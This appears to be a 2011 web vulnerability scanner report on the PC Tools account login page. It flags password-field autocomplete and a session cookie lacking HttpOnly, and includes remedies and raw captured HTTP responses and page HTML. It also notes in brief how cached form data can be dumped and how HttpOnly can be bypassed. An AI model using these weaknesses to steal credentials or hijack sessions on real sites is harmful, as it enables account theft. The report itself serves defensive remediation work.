Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 6468
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:08 GMT
Connection: keep-alive
Set-Cookie: PHPSESSID=2e26588c894c8bf4f2bc494429cdbc23; expires=Mon, 21 Mar 2011 02:23:08 GMT; path=/; domain=pctools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>PC Tools - My Account
</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <meta name="description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."> <meta name="keywords" content="PC Software, PC software download, PC utilities"> <meta name="google-site-verification" content="9tcREuFGzBlAoggj4zkFO8K2P1g23EWWZznTZE_vvVk"> <meta name="y_key" content="bbf4ccb064a49855"> <meta name="msvalidate.01" content="F34816E282A125EA2B36F92F1F4DEBE5">  <meta property="og:title" content="PC Tools - My Account
"/> <meta property="og:type" content="website"/> <meta property="og:url" content="http://secure.pctools.com/myaccount/"/> <meta property="og:site_name" content="PCTOOLS"/> <meta property="fb:admins" content="100000215074489"/> <meta property="og:description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."/> <link href="/res/new/css/style-min.css" rel="stylesheet" type="text/css" media="screen, projection"> <link href="/res/css/print.css" rel="stylesheet" type="text/css" media="print"> <script src='/res/new/js/pctools-min.js' type='text/javascript'></script> <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var uri = new Object();
getURL(uri);
var up = uri.path;
up = up.replace(/[/]*$/g,'');
if(up.search(/^\//) < 0) { up='/'+up;}
if(up.search(/\/$/) < 0) { up=up+"/";}

var pageTracker = _gat._getTracker("UA-1490218-1");
if(getRef() != "") { pageTracker._setCampNameKey("ref");}
if(getParam('utm_campaign') != "") { pageTracker._setCampNameKey("utm_campaign");}
pageTracker._setDomainName(".pctools.com");
pageTracker._initData();
pageTracker._trackPageview(up);
</script><script src='/res/js/mbox.js' type='text/javascript'></script> <script type="text/javascript" src="/res/js/jquery-1.4.2.min.js"></script> <link rel="canonical" href="http://www.pctools.com/guides/password/"> <link rel="stylesheet" href="/res/new/css/coda-slider-2.0-min.css" type="text/css" media="screen"> <link rel="stylesheet" href="/res/new/css/smoothness/jquery-ui-1.8.custom-min.css" type="text/css" media="screen"> <link type="text/css" href="/res/new/css/smoothness/jquery-ui-1.8.accordion-min.css" rel="stylesheet" media="screen"> <link href="/res/new/css/myaccount.css" rel="stylesheet" type="text/css" media="screen, projection"> <style type="text/css"> img, input, form, li, li#login a, ul { behavior: url(/res/new/images/iepngfix.htc) } </style> <link href="/res/new/css/en.css" rel="stylesheet" type="text/css" media="screen, projection"></head><body><div id="header"> <a href="http://www.pctools.com/"><img class="logo" src="/res/new/images/logo.png" alt="PC Antivirus Antispyware Software and Windows Utilities - PC Tools"></a></div><ul id="topnav"><li class="nav" id="home"><a href="http://www.pctools.com/">Home</a></li><li class="nav" id="dropdown"><a href="http://www.pctools.com/pc-software/">Software <img src="/res/new/images/dropdown-arrowdown.png"></a><div class="clear"></div><div class="sub"><ul><li><h3>Security Software</h3></li><li><a href="http://www.pctools.com/internet-security/">PC Tools<sup></sup> Internet Security</a></li><li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup></sup> with AntiVirus</a></li><li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup></sup> </a></li><li><a href="http://www.pctools.com/free-antivirus/">PC Tools<sup></sup> AntiVirus Free </a></li><li><a href="http://www.threatfire.com/">ThreatFire</a></li><li><a href="http://www.iantivirus.com/">iAntiVirus for Mac OS X</a></li><li><a href="http://www.pctools.com/firewall/">PC Tools<sup></sup> Firewall Plus</a></li></ul><ul><li><h3>Utility Software</h3></li><li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup></sup> Performance Toolkit</a></li><li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup></sup></a></li><li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup></sup> Simple Backup</a></li><li><a href="http://www.pctools.com/file-recover/">PC Tools<sup></sup> File Recover</a></li><li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup></sup> Privacy Guardian</a></li><li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li><li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul></div></li><li class="nav" id=""><a href="http://www.pctools.com/support/">Support</a></li><li class="nav" id=""><a href="http://www.pctools.com/company/">Company</a></li><li id="corner-right" class="nav"><img src="/res/new/images/navbg-right.gif"/></li><li id="login" class="nav"> <span id="myaccount_login" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount Login</a></span> <span id="myaccount_logout" style="display: none;"><a href="/myaccount/logout/" rel="NOFOLLOW" style="color:#FFF">Logout</a></span> <span id="myaccount" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount</a></span></li></ul><div id="ps"></div><script type="text/javascript"> var authenticated = 0; var pr_auth = 0; var language = 'en';</script>   <div id="main-top"> <p align="right" style="margin-top: 0px;"><a href="http://www.pctools.com/support/">Go to Support Home Page</a><br><a href="http://www.pctools.com/contact/support/">Go to Online Knowledgebase</a></p><h1>PC Tools Login</h1><div class="support-box first"> <div class="title-bar"><h4>Login to My Account</h4></div> <div class="support-box-content"> <p>Please enter your login details below to access PC Tools MyAccount.</p> <p class="error" style="margin-left: 4px;"></p> <form id="login" method="post" action="/myaccount/"> <label class="fieldlabel" for="username">E-mail:</label> <input class="textinput" name="username" type="text" value=""> <label class="fieldlabel" for="password">Password:</label> <input class="textinput" name="password" type="password"> <input name="remember" type="checkbox" value="1"> <label for="remember">Remember me on this computer</label> <button class="btn-login" value="Login" type="submit" style=" background-image: url(/res/new/images/support/btn-login.png)">Login Now!</button> </form> <p class="small"><a href="/myaccount/signup/">Don't have an account</a> or <a href="/myaccount/password/">forgot your password?</a></p> </div></div><div class="support-box"> <div class="title-bar"> <h4>Create an Account</h4></div> <div class="support-box-content"> <p>New to PC Tools? Create an account now and stay informed about important software upgrades, new product releases, special offers, subscription expiry reminders and personalized online support.</p> <a class="signup-now" style=" background-image: url(/res/new/images/btn-signupnow.jpg)" href="/myaccount/signup/">Signup Now!</a> </div></div> <div class="clear"> </div></div><div id="footer"> <div class="footer-content"><ul> <li class="footer-header">Security Software</li> <li><a href="http://free.pctools.com/free-antivirus/">Free AntiVirus Software</a></li> <li><a href="http://www.pctools.com/internet-security/">PC Tools<sup>™</sup> Internet Security</a></li> <li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup>™</sup> with AntiVirus</a></li> <li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup>™</sup> </a></li> <li><a href="http://www.threatfire.com">ThreatFire</a></li> <li><a href="http://www.browserdefender.com/">Browser Defender</a></li></ul><ul> <li class="footer-header">Utility Software</li> <li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup>™</sup> Performance Toolkit</a></li> <li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup>™</sup></a></li> <li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup>™</sup> Simple Backup</a></li> <li><a href="http://www.pctools.com/file-recover/">PC Tools<sup>™</sup> File Recover</a></li> <li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup>™</sup> Privacy Guardian</a></li> <li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li> <li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul><ul class="narrow"> <li class="footer-header">Links</li> <li><a href="http://www.pctools.com/security-news/glossary/">Adware Glossary</a></li> <li><a href="http://www.pctools.com/mrc/dispute/">Spyware Disputes</a></li> <li><a href="http://www.pctools.com/security-news/">Security News</a></li> <li><a href="http://www.pctools.com/sitemap/">Sitemap</a></li> <li><a href="http://www.pctools.com/mrc/infections/">Infection Database</a></li></ul><ul class="narrow"> <li class="footer-header">Company</li> <li><a href="http://www.pctools.com/company/">About Us</a></li> <li><a href="http://www.pctools.com/company/awards/">Awards</a></li> <li><a href="http://www.pctools.com/labs/">Labs</a></li> <li><a href="http://www.pctools.com/partners/">Partners</a></li></ul><div class="social"> <span class="footer-header">Get Updates</span><br> <span class="ok" id="subscriberesult_btm"></span> <form action="/newsletter/subscribe/" name="softmail" method="post"> <input type="hidden" value="" name="detail_id" /> <input type="hidden" value="default" name="product" /> <input type="text" title="Enter your e-mail address" id="email_btm" name="email" class="blur" /> <input type="submit" onclick="newsletterSubscribe_btm(); return false;" value="Submit" /> <input type="hidden" value="1" name="submitted"> </form> <ul class="social-links"> <li id="facebook"><img src="/res/new/images/facebook.png">  <a href="http://www.facebook.com/PCTOOLS">Find us on Facebook</a></li> <li id ="like"><iframe src="http://www.facebook.com/plugins/like.php?href=secure.pctools.com/myaccount/&layout=button_count&width=90&action=like&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:20px;" allowTransparency="true"></iframe></li> <li id="twitter" ><img src="/res/new/images/twitter.png">  <a href="http://twitter.com/pctools">Find us on Twitter</a></li> </ul> </div> <div style="clear:both"></div> <script type="text/javascript"> function Ajax() { // This is how we make Private variables. var http_request = false var callback_fctn = false // This is how we make a Private method - it is the only way to access the Private variables above. function contents() { if( http_request.readyState == 4 ) { if( http_request.status == 200 ) { callback_fctn(http_request) } http_request = false callback_fctn = false } } // And this is a Privileged method - it cannot be replaced, but it has Public accessability and can work with Private variables and methods. // (Many people would call this a Public method, which is almost correct insofar as it is available publically.) this.request = function(url, return_fctn, post_data) { if( http_request ) // Oops: request in process! return false if( window.XMLHttpRequest ) { // Mozilla, Safari,... http_request = new XMLHttpRequest() // This might be reqiured for Mozilla at some point // if( http_request.overrideMimeType ) http_request.overrideMimeType('text/xml'); } else if( window.ActiveXObject ) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { } } } if( !http_request ) { // alert('Giving up -- Cannot create an XMLHTTP instance'); return false; } // Anonymous functions like this lead to memory leaks in IE6, unfortunately. // this.http_request.onreadystatechange = function() { Ajax.contents(http_request, return_fctn); }; callback_fctn = return_fctn http_request.onreadystatechange = contents; if( post_data ) { http_request.open('POST', url, true); http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); http_request.setRequestHeader('Cookie', document.cookie); http_request.send(post_data); } else { http_request.open('GET', url, true) http_request.setRequestHeader('Cookie', document.cookie); http_request.send(null); } return true; };}</script><script type="text/javascript">var supportAjax_btm = new Ajax();var theElement_btm = "subscriberesult_btm";function updateView_btm(request) { if (document.getElementById(theElement_btm) && request.responseText != "") { document.getElementById(theElement_btm).style.display = ''; document.getElementById(theElement_btm).innerHTML = request.responseText; }}function newsletterSubscribe_btm() { supportAjax_btm.request('/res/ajax/newsletter.php?email=' + encodeURIComponent(document.getElementById('email_btm').value) + '&product=myaccount&language=en',updateView_btm);}</script> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="250" class="noprint"> </td> <td class="copy" align="center">Copyright © 1998-2011 PC Tools. All rights reserved.</td> <td class="copy noprint" width="250" align="righ..

Auto Complete Enabled

1 TOTAL

LOW

CONFIRMED

"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

See the remedy for the solution.
Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

Using AutoComplete in HTML Forms

- /myaccount/

/myaccount/ CONFIRMED

https://secure.pctools.com/myaccount/

Identified Field Name

password

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 6468
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:08 GMT
Connection: keep-alive
Set-Cookie: PHPSESSID=2e26588c894c8bf4f2bc494429cdbc23; expires=Mon, 21 Mar 2011 02:23:08 GMT; path=/; domain=pctools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>PC Tools - My Account
</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <meta name="description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."> <meta name="keywords" content="PC Software, PC software download, PC utilities"> <meta name="google-site-verification" content="9tcREuFGzBlAoggj4zkFO8K2P1g23EWWZznTZE_vvVk"> <meta name="y_key" content="bbf4ccb064a49855"> <meta name="msvalidate.01" content="F34816E282A125EA2B36F92F1F4DEBE5">  <meta property="og:title" content="PC Tools - My Account
"/> <meta property="og:type" content="website"/> <meta property="og:url" content="http://secure.pctools.com/myaccount/"/> <meta property="og:site_name" content="PCTOOLS"/> <meta property="fb:admins" content="100000215074489"/> <meta property="og:description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."/> <link href="/res/new/css/style-min.css" rel="stylesheet" type="text/css" media="screen, projection"> <link href="/res/css/print.css" rel="stylesheet" type="text/css" media="print"> <script src='/res/new/js/pctools-min.js' type='text/javascript'></script> <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var uri = new Object();
getURL(uri);
var up = uri.path;
up = up.replace(/[/]*$/g,'');
if(up.search(/^\//) < 0) { up='/'+up;}
if(up.search(/\/$/) < 0) { up=up+"/";}

var pageTracker = _gat._getTracker("UA-1490218-1");
if(getRef() != "") { pageTracker._setCampNameKey("ref");}
if(getParam('utm_campaign') != "") { pageTracker._setCampNameKey("utm_campaign");}
pageTracker._setDomainName(".pctools.com");
pageTracker._initData();
pageTracker._trackPageview(up);
</script><script src='/res/js/mbox.js' type='text/javascript'></script> <script type="text/javascript" src="/res/js/jquery-1.4.2.min.js"></script> <link rel="canonical" href="http://www.pctools.com/guides/password/"> <link rel="stylesheet" href="/res/new/css/coda-slider-2.0-min.css" type="text/css" media="screen"> <link rel="stylesheet" href="/res/new/css/smoothness/jquery-ui-1.8.custom-min.css" type="text/css" media="screen"> <link type="text/css" href="/res/new/css/smoothness/jquery-ui-1.8.accordion-min.css" rel="stylesheet" media="screen"> <link href="/res/new/css/myaccount.css" rel="stylesheet" type="text/css" media="screen, projection"> <style type="text/css"> img, input, form, li, li#login a, ul { behavior: url(/res/new/images/iepngfix.htc) } </style> <link href="/res/new/css/en.css" rel="stylesheet" type="text/css" media="screen, projection"></head><body><div id="header"> <a href="http://www.pctools.com/"><img class="logo" src="/res/new/images/logo.png" alt="PC Antivirus Antispyware Software and Windows Utilities - PC Tools"></a></div><ul id="topnav"><li class="nav" id="home"><a href="http://www.pctools.com/">Home</a></li><li class="nav" id="dropdown"><a href="http://www.pctools.com/pc-software/">Software <img src="/res/new/images/dropdown-arrowdown.png"></a><div class="clear"></div><div class="sub"><ul><li><h3>Security Software</h3></li><li><a href="http://www.pctools.com/internet-security/">PC Tools<sup></sup> Internet Security</a></li><li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup></sup> with AntiVirus</a></li><li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup></sup> </a></li><li><a href="http://www.pctools.com/free-antivirus/">PC Tools<sup></sup> AntiVirus Free </a></li><li><a href="http://www.threatfire.com/">ThreatFire</a></li><li><a href="http://www.iantivirus.com/">iAntiVirus for Mac OS X</a></li><li><a href="http://www.pctools.com/firewall/">PC Tools<sup></sup> Firewall Plus</a></li></ul><ul><li><h3>Utility Software</h3></li><li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup></sup> Performance Toolkit</a></li><li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup></sup></a></li><li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup></sup> Simple Backup</a></li><li><a href="http://www.pctools.com/file-recover/">PC Tools<sup></sup> File Recover</a></li><li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup></sup> Privacy Guardian</a></li><li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li><li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul></div></li><li class="nav" id=""><a href="http://www.pctools.com/support/">Support</a></li><li class="nav" id=""><a href="http://www.pctools.com/company/">Company</a></li><li id="corner-right" class="nav"><img src="/res/new/images/navbg-right.gif"/></li><li id="login" class="nav"> <span id="myaccount_login" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount Login</a></span> <span id="myaccount_logout" style="display: none;"><a href="/myaccount/logout/" rel="NOFOLLOW" style="color:#FFF">Logout</a></span> <span id="myaccount" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount</a></span></li></ul><div id="ps"></div><script type="text/javascript"> var authenticated = 0; var pr_auth = 0; var language = 'en';</script>   <div id="main-top"> <p align="right" style="margin-top: 0px;"><a href="http://www.pctools.com/support/">Go to Support Home Page</a><br><a href="http://www.pctools.com/contact/support/">Go to Online Knowledgebase</a></p><h1>PC Tools Login</h1><div class="support-box first"> <div class="title-bar"><h4>Login to My Account</h4></div> <div class="support-box-content"> <p>Please enter your login details below to access PC Tools MyAccount.</p> <p class="error" style="margin-left: 4px;"></p> <form id="login" method="post" action="/myaccount/"> <label class="fieldlabel" for="username">E-mail:</label> <input class="textinput" name="username" type="text" value=""> <label class="fieldlabel" for="password">Password:</label> <input class="textinput" name="password" type="password"> <input name="remember" type="checkbox" value="1"> <label for="remember">Remember me on this computer</label> <button class="btn-login" value="Login" type="submit" style=" background-image: url(/res/new/images/support/btn-login.png)">Login Now!</button> </form> <p class="small"><a href="/myaccount/signup/">Don't have an account</a> or <a href="/myaccount/password/">forgot your password?</a></p> </div></div><div class="support-box"> <div class="title-bar"> <h4>Create an Account</h4></div> <div class="support-box-content"> <p>New to PC Tools? Create an account now and stay informed about important software upgrades, new product releases, special offers, subscription expiry reminders and personalized online support.</p> <a class="signup-now" style=" background-image: url(/res/new/images/btn-signupnow.jpg)" href="/myaccount/signup/">Signup Now!</a> </div></div> <div class="clear"> </div></div><div id="footer"> <div class="footer-content"><ul> <li class="footer-header">Security Software</li> <li><a href="http://free.pctools.com/free-antivirus/">Free AntiVirus Software</a></li> <li><a href="http://www.pctools.com/internet-security/">PC Tools<sup>™</sup> Internet Security</a></li> <li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup>™</sup> with AntiVirus</a></li> <li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup>™</sup> </a></li> <li><a href="http://www.threatfire.com">ThreatFire</a></li> <li><a href="http://www.browserdefender.com/">Browser Defender</a></li></ul><ul> <li class="footer-header">Utility Software</li> <li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup>™</sup> Performance Toolkit</a></li> <li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup>™</sup></a></li> <li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup>™</sup> Simple Backup</a></li> <li><a href="http://www.pctools.com/file-recover/">PC Tools<sup>™</sup> File Recover</a></li> <li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup>™</sup> Privacy Guardian</a></li> <li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li> <li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul><ul class="narrow"> <li class="footer-header">Links</li> <li><a href="http://www.pctools.com/security-news/glossary/">Adware Glossary</a></li> <li><a href="http://www.pctools.com/mrc/dispute/">Spyware Disputes</a></li> <li><a href="http://www.pctools.com/security-news/">Security News</a></li> <li><a href="http://www.pctools.com/sitemap/">Sitemap</a></li> <li><a href="http://www.pctools.com/mrc/infections/">Infection Database</a></li></ul><ul class="narrow"> <li class="footer-header">Company</li> <li><a href="http://www.pctools.com/company/">About Us</a></li> <li><a href="http://www.pctools.com/company/awards/">Awards</a></li> <li><a href="http://www.pctools.com/labs/">Labs</a></li> <li><a href="http://www.pctools.com/partners/">Partners</a></li></ul><div class="social"> <span class="footer-header">Get Updates</span><br> <span class="ok" id="subscriberesult_btm"></span> <form action="/newsletter/subscribe/" name="softmail" method="post"> <input type="hidden" value="" name="detail_id" /> <input type="hidden" value="default" name="product" /> <input type="text" title="Enter your e-mail address" id="email_btm" name="email" class="blur" /> <input type="submit" onclick="newsletterSubscribe_btm(); return false;" value="Submit" /> <input type="hidden" value="1" name="submitted"> </form> <ul class="social-links"> <li id="facebook"><img src="/res/new/images/facebook.png">  <a href="http://www.facebook.com/PCTOOLS">Find us on Facebook</a></li> <li id ="like"><iframe src="http://www.facebook.com/plugins/like.php?href=secure.pctools.com/myaccount/&layout=button_count&width=90&action=like&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:20px;" allowTransparency="true"></iframe></li> <li id="twitter" ><img src="/res/new/images/twitter.png">  <a href="http://twitter.com/pctools">Find us on Twitter</a></li> </ul> </div> <div style="clear:both"></div> <script type="text/javascript"> function Ajax() { // This is how we make Private variables. var http_request = false var callback_fctn = false // This is how we make a Private method - it is the only way to access the Private variables above. function contents() { if( http_request.readyState == 4 ) { if( http_request.status == 200 ) { callback_fctn(http_request) } http_request = false callback_fctn = false } } // And this is a Privileged method - it cannot be replaced, but it has Public accessability and can work with Private variables and methods. // (Many people would call this a Public method, which is almost correct insofar as it is available publically.) this.request = function(url, return_fctn, post_data) { if( http_request ) // Oops: request in process! return false if( window.XMLHttpRequest ) { // Mozilla, Safari,... http_request = new XMLHttpRequest() // This might be reqiured for Mozilla at some point // if( http_request.overrideMimeType ) http_request.overrideMimeType('text/xml'); } else if( window.ActiveXObject ) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { } } } if( !http_request ) { // alert('Giving up -- Cannot create an XMLHTTP instance'); return false; } // Anonymous functions like this lead to memory leaks in IE6, unfortunately. // this.http_request.onreadystatechange = function() { Ajax.contents(http_request, return_fctn); }; callback_fctn = return_fctn http_request.onreadystatechange = contents; if( post_data ) { http_request.open('POST', url, true); http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); http_request.setRequestHeader('Cookie', document.cookie); http_request.send(post_data); } else { http_request.open('GET', url, true) http_request.setRequestHeader('Cookie', document.cookie); http_request.send(null); } return true; };}</script><script type="text/javascript">var supportAjax_btm = new Ajax();var theElement_btm = "subscriberesult_btm";function updateView_btm(request) { if (document.getElementById(theElement_btm) && request.responseText != "") { document.getElementById(theElement_btm).style.display = ''; document.getElementById(theElement_btm).innerHTML = request.responseText; }}function newsletterSubscribe_btm() { supportAjax_btm.request('/res/ajax/newsletter.php?email=' + encodeURIComponent(document.getElementById('email_btm').value) + '&product=myaccount&language=en',updateView_btm);}</script> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="250" class="noprint"> </td> <td class="copy" align="center">Copyright © 1998-2011 PC Tools. All rights reserved.</td> <td class="copy noprint" width="250" align="righ..

Cookie Not Marked As HttpOnly

1 TOTAL

LOW

CONFIRMED

Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /myaccount/

/myaccount/ CONFIRMED

https://secure.pctools.com/myaccount/

Identified Cookie

PHPSESSID

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 6468
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:08 GMT
Connection: keep-alive
Set-Cookie: PHPSESSID=2e26588c894c8bf4f2bc494429cdbc23; expires=Mon, 21 Mar 2011 02:23:08 GMT; path=/; domain=pctools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>PC Tools - My Account
</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <meta name="description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."> <meta name="keywords" content="PC Software, PC software download, PC utilities"> <meta name="google-site-verification" content="9tcREuFGzBlAoggj4zkFO8K2P1g23EWWZznTZE_vvVk"> <meta name="y_key" content="bbf4ccb064a49855"> <meta name="msvalidate.01" content="F34816E282A125EA2B36F92F1F4DEBE5">  <meta property="og:title" content="PC Tools - My Account
"/> <meta property="og:type" content="website"/> <meta property="og:url" content="http://secure.pctools.com/myaccount/"/> <meta property="og:site_name" content="PCTOOLS"/> <meta property="fb:admins" content="100000215074489"/> <meta property="og:description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."/> <link href="/res/new/css/style-min.css" rel="stylesheet" type="text/css" media="screen, projection"> <link href="/res/css/print.css" rel="stylesheet" type="text/css" media="print"> <script src='/res/new/js/pctools-min.js' type='text/javascript'></script> <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var uri = new Object();
getURL(uri);
var up = uri.path;
up = up.replace(/[/]*$/g,'');
if(up.search(/^\//) < 0) { up='/'+up;}
if(up.search(/\/$/) < 0) { up=up+"/";}

var pageTracker = _gat._getTracker("UA-1490218-1");
if(getRef() != "") { pageTracker._setCampNameKey("ref");}
if(getParam('utm_campaign') != "") { pageTracker._setCampNameKey("utm_campaign");}
pageTracker._setDomainName(".pctools.com");
pageTracker._initData();
pageTracker._trackPageview(up);
